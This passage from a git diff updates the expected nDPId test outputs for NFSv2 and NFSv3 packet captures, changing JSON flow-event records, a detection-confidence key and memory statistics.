Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"6":"DPI"},"proto":"NFS","breed":"Acceptable","category":"DataTransfer"}} 00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":156,"source":"nfsv2.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":2,"flow_last_seen":944207338890,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":944207338890,"pkt":"AMCV4Bm+AMCV+E3TCABFAAA0j18AAEARqL+LGRZmixkWAgQYAq4AIJpzOErjjgAAAAEAAAAAAAAAAAAAAAAAAAAA"} -00676{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":156,"source":"nfsv2.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":944207338450,"flow_last_seen":944207338450,"flow_idle_time":200000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":64,"flow_avg_l4_payload_len":32,"midstream":0,"thread_ts_msec":944207338890,"l3_proto":"ip4","src_ip":"139.25.22.2","dst_ip":"139.25.22.102","src_port":3292,"dst_port":2049,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"NFS","breed":"Acceptable","category":"DataTransfer"}} -00808{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":156,"source":"nfsv2.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":944207338400,"flow_last_seen":944207338410,"flow_idle_time":200000,"flow_min_l4_payload_len":48,"flow_max_l4_payload_len":64,"flow_tot_l4_payload_len":112,"flow_avg_l4_payload_len":56,"midstream":0,"thread_ts_msec":944207338890,"l3_proto":"ip4","src_ip":"139.25.22.2","dst_ip":"139.25.22.102","src_port":3289,"dst_port":111,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std 
Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"NFS","breed":"Acceptable","category":"DataTransfer"}} -00808{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":156,"source":"nfsv2.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":944207338440,"flow_last_seen":944207338450,"flow_idle_time":200000,"flow_min_l4_payload_len":48,"flow_max_l4_payload_len":64,"flow_tot_l4_payload_len":112,"flow_avg_l4_payload_len":56,"midstream":0,"thread_ts_msec":944207338890,"l3_proto":"ip4","src_ip":"139.25.22.2","dst_ip":"139.25.22.102","src_port":3291,"dst_port":111,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"NFS","breed":"Acceptable","category":"DataTransfer"}} -00808{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":156,"source":"nfsv2.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":944207338880,"flow_last_seen":944207338890,"flow_idle_time":200000,"flow_min_l4_payload_len":48,"flow_max_l4_payload_len":64,"flow_tot_l4_payload_len":112,"flow_avg_l4_payload_len":56,"midstream":0,"thread_ts_msec":944207338890,"l3_proto":"ip4","src_ip":"139.25.22.2","dst_ip":"139.25.22.102","src_port":3293,"dst_port":111,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"NFS","breed":"Acceptable","category":"DataTransfer"}} 
-00809{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":156,"source":"nfsv2.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":944207338410,"flow_last_seen":944207338430,"flow_idle_time":200000,"flow_min_l4_payload_len":60,"flow_max_l4_payload_len":116,"flow_tot_l4_payload_len":176,"flow_avg_l4_payload_len":88,"midstream":0,"thread_ts_msec":944207338890,"l3_proto":"ip4","src_ip":"139.25.22.2","dst_ip":"139.25.22.102","src_port":671,"dst_port":1048,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"NFS","breed":"Acceptable","category":"DataTransfer"}} -00809{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":156,"source":"nfsv2.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":944207338890,"flow_last_seen":944207338890,"flow_idle_time":200000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":116,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":70,"midstream":0,"thread_ts_msec":944207338890,"l3_proto":"ip4","src_ip":"139.25.22.2","dst_ip":"139.25.22.102","src_port":686,"dst_port":1048,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"NFS","breed":"Acceptable","category":"DataTransfer"}} 
-00683{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":156,"source":"nfsv2.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"finished","flow_packets_processed":144,"flow_first_seen":944207338490,"flow_last_seen":944207338840,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":172,"flow_tot_l4_payload_len":15876,"flow_avg_l4_payload_len":110,"midstream":0,"thread_ts_msec":944207338890,"l3_proto":"ip4","src_ip":"139.25.22.2","dst_ip":"139.25.22.102","src_port":1023,"dst_port":2049,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"NFS","breed":"Acceptable","category":"DataTransfer"}} +00676{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":156,"source":"nfsv2.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":944207338450,"flow_last_seen":944207338450,"flow_idle_time":200000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":64,"flow_avg_l4_payload_len":32,"midstream":0,"thread_ts_msec":944207338890,"l3_proto":"ip4","src_ip":"139.25.22.2","dst_ip":"139.25.22.102","src_port":3292,"dst_port":2049,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"NFS","breed":"Acceptable","category":"DataTransfer"}} +00808{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":156,"source":"nfsv2.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":944207338400,"flow_last_seen":944207338410,"flow_idle_time":200000,"flow_min_l4_payload_len":48,"flow_max_l4_payload_len":64,"flow_tot_l4_payload_len":112,"flow_avg_l4_payload_len":56,"midstream":0,"thread_ts_msec":944207338890,"l3_proto":"ip4","src_ip":"139.25.22.2","dst_ip":"139.25.22.102","src_port":3289,"dst_port":111,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known 
Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"6":"DPI"},"proto":"NFS","breed":"Acceptable","category":"DataTransfer"}} +00808{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":156,"source":"nfsv2.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":944207338440,"flow_last_seen":944207338450,"flow_idle_time":200000,"flow_min_l4_payload_len":48,"flow_max_l4_payload_len":64,"flow_tot_l4_payload_len":112,"flow_avg_l4_payload_len":56,"midstream":0,"thread_ts_msec":944207338890,"l3_proto":"ip4","src_ip":"139.25.22.2","dst_ip":"139.25.22.102","src_port":3291,"dst_port":111,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"6":"DPI"},"proto":"NFS","breed":"Acceptable","category":"DataTransfer"}} +00808{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":156,"source":"nfsv2.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":944207338880,"flow_last_seen":944207338890,"flow_idle_time":200000,"flow_min_l4_payload_len":48,"flow_max_l4_payload_len":64,"flow_tot_l4_payload_len":112,"flow_avg_l4_payload_len":56,"midstream":0,"thread_ts_msec":944207338890,"l3_proto":"ip4","src_ip":"139.25.22.2","dst_ip":"139.25.22.102","src_port":3293,"dst_port":111,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"6":"DPI"},"proto":"NFS","breed":"Acceptable","category":"DataTransfer"}} 
+00809{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":156,"source":"nfsv2.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":944207338410,"flow_last_seen":944207338430,"flow_idle_time":200000,"flow_min_l4_payload_len":60,"flow_max_l4_payload_len":116,"flow_tot_l4_payload_len":176,"flow_avg_l4_payload_len":88,"midstream":0,"thread_ts_msec":944207338890,"l3_proto":"ip4","src_ip":"139.25.22.2","dst_ip":"139.25.22.102","src_port":671,"dst_port":1048,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"6":"DPI"},"proto":"NFS","breed":"Acceptable","category":"DataTransfer"}} +00809{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":156,"source":"nfsv2.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":944207338890,"flow_last_seen":944207338890,"flow_idle_time":200000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":116,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":70,"midstream":0,"thread_ts_msec":944207338890,"l3_proto":"ip4","src_ip":"139.25.22.2","dst_ip":"139.25.22.102","src_port":686,"dst_port":1048,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"6":"DPI"},"proto":"NFS","breed":"Acceptable","category":"DataTransfer"}} 
+00683{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":156,"source":"nfsv2.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"finished","flow_packets_processed":144,"flow_first_seen":944207338490,"flow_last_seen":944207338840,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":172,"flow_tot_l4_payload_len":15876,"flow_avg_l4_payload_len":110,"midstream":0,"thread_ts_msec":944207338890,"l3_proto":"ip4","src_ip":"139.25.22.2","dst_ip":"139.25.22.102","src_port":1023,"dst_port":2049,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"NFS","breed":"Acceptable","category":"DataTransfer"}} 00557{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":156,"source":"nfsv2.pcap","alias":"nDPId-test","packets-captured":156,"packets-processed":156,"total-skipped-flows":0,"total-l4-payload-len":16592,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":7,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":7,"total-idle-flows":7,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":39,"global_ts_msec":944207338890} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 156/156 @@ -45,9 +45,9 @@ ~~ total active/idle flows...: 7/7 ~~ total timeout flows.......: 0 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~ total memory allocated....: 5880327 bytes -~~ total memory freed........: 5880327 bytes -~~ total allocations/frees...: 118294/118294 +~~ total memory allocated....: 6013961 bytes +~~ total memory freed........: 6013961 bytes +~~ total allocations/frees...: 121056/121056 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~ json string min len.......: 461 chars ~~ json string max len.......: 814 chars diff --git a/test/results/nfsv3.pcap.out b/test/results/nfsv3.pcap.out index a576a4bb8..88d044017 100644 
--- a/test/results/nfsv3.pcap.out +++ b/test/results/nfsv3.pcap.out 
@@ -2,45 +2,45 @@ 00544{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":1,"source":"nfsv3.pcap","alias":"nDPId-test","packets-captured":1,"packets-processed":0,"total-skipped-flows":0,"total-l4-payload-len":0,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":0,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":2,"global_ts_msec":944207397280} 00571{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"nfsv3.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":944207397280,"flow_last_seen":944207397280,"flow_idle_time":200000,"flow_min_l4_payload_len":64,"flow_max_l4_payload_len":64,"flow_tot_l4_payload_len":64,"flow_avg_l4_payload_len":64,"midstream":0,"thread_ts_msec":944207397280,"l3_proto":"ip4","src_ip":"139.25.22.2","dst_ip":"139.25.22.102","src_port":3295,"dst_port":111,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00517{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"nfsv3.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":944207397280,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":106,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":106,"pkt_l4_len":72,"thread_ts_msec":944207397280,"pkt":"AMCV+E3TAMCV4Bm+CABFAABcZTwAAEAR0rqLGRYCixkWZgzfAG8ASDUOOENPaQAAAAAAAAACAAGGoAAAAAMAAAADAAAAAAAAAAAAAAAAAAAAAAABhqUAAAADAAAAA3VkcAAAAAAAAAAAAA=="} 
-00766{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"nfsv3.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":944207397280,"flow_last_seen":944207397280,"flow_idle_time":200000,"flow_min_l4_payload_len":64,"flow_max_l4_payload_len":64,"flow_tot_l4_payload_len":64,"flow_avg_l4_payload_len":64,"midstream":0,"thread_ts_msec":944207397280,"l3_proto":"ip4","src_ip":"139.25.22.2","dst_ip":"139.25.22.102","src_port":3295,"dst_port":111,"l4_proto":"udp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"NFS","breed":"Acceptable","category":"DataTransfer"}} +00766{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"nfsv3.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":944207397280,"flow_last_seen":944207397280,"flow_idle_time":200000,"flow_min_l4_payload_len":64,"flow_max_l4_payload_len":64,"flow_tot_l4_payload_len":64,"flow_avg_l4_payload_len":64,"midstream":0,"thread_ts_msec":944207397280,"l3_proto":"ip4","src_ip":"139.25.22.2","dst_ip":"139.25.22.102","src_port":3295,"dst_port":111,"l4_proto":"udp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"6":"DPI"},"proto":"NFS","breed":"Acceptable","category":"DataTransfer"}} 
00491{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"nfsv3.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":944207397280,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":90,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":90,"pkt_l4_len":56,"thread_ts_msec":944207397280,"pkt":"AMCV4Bm+AMCV+E3TCABFAABM5CwAAEARU9qLGRZmixkWAgBvDN8AOGEeOENPaQAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAEjEzOS4yNS4yMi4xMDIuNC4yNAAA"} 00572{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":3,"source":"nfsv3.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":944207397290,"flow_last_seen":944207397290,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":944207397290,"l3_proto":"ip4","src_ip":"139.25.22.2","dst_ip":"139.25.22.102","src_port":3296,"dst_port":1048,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00483{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"nfsv3.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":944207397290,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":82,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":82,"pkt_l4_len":48,"thread_ts_msec":944207397290,"pkt":"AMCV+E3TAMCV4Bm+CABFAABEZT0AAEAR0tGLGRYCixkWZgzgBBgAMHazOEN2WQAAAAAAAAACAAGGpQAAAAMAAAAAAAAAAAAAAAAAAAAAAAAAAA=="} 
-00767{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":3,"source":"nfsv3.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":944207397290,"flow_last_seen":944207397290,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":944207397290,"l3_proto":"ip4","src_ip":"139.25.22.2","dst_ip":"139.25.22.102","src_port":3296,"dst_port":1048,"l4_proto":"udp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"NFS","breed":"Acceptable","category":"DataTransfer"}} +00767{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":3,"source":"nfsv3.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":944207397290,"flow_last_seen":944207397290,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":944207397290,"l3_proto":"ip4","src_ip":"139.25.22.2","dst_ip":"139.25.22.102","src_port":3296,"dst_port":1048,"l4_proto":"udp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"6":"DPI"},"proto":"NFS","breed":"Acceptable","category":"DataTransfer"}} 
00459{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4,"source":"nfsv3.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":2,"flow_last_seen":944207397290,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":944207397290,"pkt":"AMCV4Bm+AMCV+E3TCABFAAA05C8AAEARU++LGRZmixkWAgQYDOAAIP19OEN2WQAAAAEAAAAAAAAAAAAAAAAAAAAA"} 00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":5,"source":"nfsv3.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":944207397290,"flow_last_seen":944207397290,"flow_idle_time":200000,"flow_min_l4_payload_len":116,"flow_max_l4_payload_len":116,"flow_tot_l4_payload_len":116,"flow_avg_l4_payload_len":116,"midstream":0,"thread_ts_msec":944207397290,"l3_proto":"ip4","src_ip":"139.25.22.2","dst_ip":"139.25.22.102","src_port":706,"dst_port":1048,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00586{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5,"source":"nfsv3.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":1,"flow_last_seen":944207397290,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":158,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":158,"pkt_l4_len":124,"thread_ts_msec":944207397290,"pkt":"AMCV+E3TAMCV4Bm+CABFAACQZT4AAEAR0oSLGRYCixkWZgLCBBgAfLn3OER2WQAAAAAAAAACAAGGpQAAAAMAAAABAAAAAQAAADQ4R3YLAAAACXdlcnJtc2NoZQAAAAAAAAAAAAABAAAABQAAAAEAAAAAAAAAAgAAAAMAAAARAAAAAAAAAAAAAAAUL2hvbWUvZ2lybGljaC9leHBvcnQ="} 
-00770{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":5,"source":"nfsv3.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":944207397290,"flow_last_seen":944207397290,"flow_idle_time":200000,"flow_min_l4_payload_len":116,"flow_max_l4_payload_len":116,"flow_tot_l4_payload_len":116,"flow_avg_l4_payload_len":116,"midstream":0,"thread_ts_msec":944207397290,"l3_proto":"ip4","src_ip":"139.25.22.2","dst_ip":"139.25.22.102","src_port":706,"dst_port":1048,"l4_proto":"udp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"NFS","breed":"Acceptable","category":"DataTransfer"}} +00770{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":5,"source":"nfsv3.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":944207397290,"flow_last_seen":944207397290,"flow_idle_time":200000,"flow_min_l4_payload_len":116,"flow_max_l4_payload_len":116,"flow_tot_l4_payload_len":116,"flow_avg_l4_payload_len":116,"midstream":0,"thread_ts_msec":944207397290,"l3_proto":"ip4","src_ip":"139.25.22.2","dst_ip":"139.25.22.102","src_port":706,"dst_port":1048,"l4_proto":"udp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"6":"DPI"},"proto":"NFS","breed":"Acceptable","category":"DataTransfer"}} 
00525{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6,"source":"nfsv3.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":2,"flow_last_seen":944207397310,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":114,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":114,"pkt_l4_len":80,"thread_ts_msec":944207397310,"pkt":"AMCV4Bm+AMCV+E3TCABFAABk5DcAAEARU7eLGRZmixkWAgQYAsIAUI2BOER2WQAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACAAEBCFAAAD5wAKAAAAALJaAAAAKQAKAAAAALJaAAAAKQAAAAEAAAAB"} 00571{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":7,"source":"nfsv3.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":944207397320,"flow_last_seen":944207397320,"flow_idle_time":200000,"flow_min_l4_payload_len":64,"flow_max_l4_payload_len":64,"flow_tot_l4_payload_len":64,"flow_avg_l4_payload_len":64,"midstream":0,"thread_ts_msec":944207397320,"l3_proto":"ip4","src_ip":"139.25.22.2","dst_ip":"139.25.22.102","src_port":3297,"dst_port":111,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00517{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7,"source":"nfsv3.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":1,"flow_last_seen":944207397320,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":106,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":106,"pkt_l4_len":72,"thread_ts_msec":944207397320,"pkt":"AMCV+E3TAMCV4Bm+CABFAABcZT8AAEAR0reLGRYCixkWZgzhAG8ASKFNOEPjKQAAAAAAAAACAAGGoAAAAAMAAAADAAAAAAAAAAAAAAAAAAAAAAABhqMAAAADAAAAA3VkcAAAAAAAAAAAAA=="} 
-00766{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":7,"source":"nfsv3.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":944207397320,"flow_last_seen":944207397320,"flow_idle_time":200000,"flow_min_l4_payload_len":64,"flow_max_l4_payload_len":64,"flow_tot_l4_payload_len":64,"flow_avg_l4_payload_len":64,"midstream":0,"thread_ts_msec":944207397320,"l3_proto":"ip4","src_ip":"139.25.22.2","dst_ip":"139.25.22.102","src_port":3297,"dst_port":111,"l4_proto":"udp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"NFS","breed":"Acceptable","category":"DataTransfer"}} +00766{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":7,"source":"nfsv3.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":944207397320,"flow_last_seen":944207397320,"flow_idle_time":200000,"flow_min_l4_payload_len":64,"flow_max_l4_payload_len":64,"flow_tot_l4_payload_len":64,"flow_avg_l4_payload_len":64,"midstream":0,"thread_ts_msec":944207397320,"l3_proto":"ip4","src_ip":"139.25.22.2","dst_ip":"139.25.22.102","src_port":3297,"dst_port":111,"l4_proto":"udp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"6":"DPI"},"proto":"NFS","breed":"Acceptable","category":"DataTransfer"}} 
00491{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8,"source":"nfsv3.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":2,"flow_last_seen":944207397320,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":90,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":90,"pkt_l4_len":56,"thread_ts_msec":944207397320,"pkt":"AMCV4Bm+AMCV+E3TCABFAABM5DsAAEARU8uLGRZmixkWAgBvDOEAOMqQOEPjKQAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAETEzOS4yNS4yMi4xMDIuOC4xAAAA"} 00572{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":9,"source":"nfsv3.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":944207397330,"flow_last_seen":944207397330,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":944207397330,"l3_proto":"ip4","src_ip":"139.25.22.2","dst_ip":"139.25.22.102","src_port":3298,"dst_port":2049,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00483{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9,"source":"nfsv3.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":1,"flow_last_seen":944207397330,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":82,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":82,"pkt_l4_len":48,"thread_ts_msec":944207397330,"pkt":"AMCV+E3TAMCV4Bm+CABFAABEZUAAAEAR0s6LGRYCixkWZgziCAEAMF8KOEOKGQAAAAAAAAACAAGGowAAAAMAAAAAAAAAAAAAAAAAAAAAAAAAAA=="} 
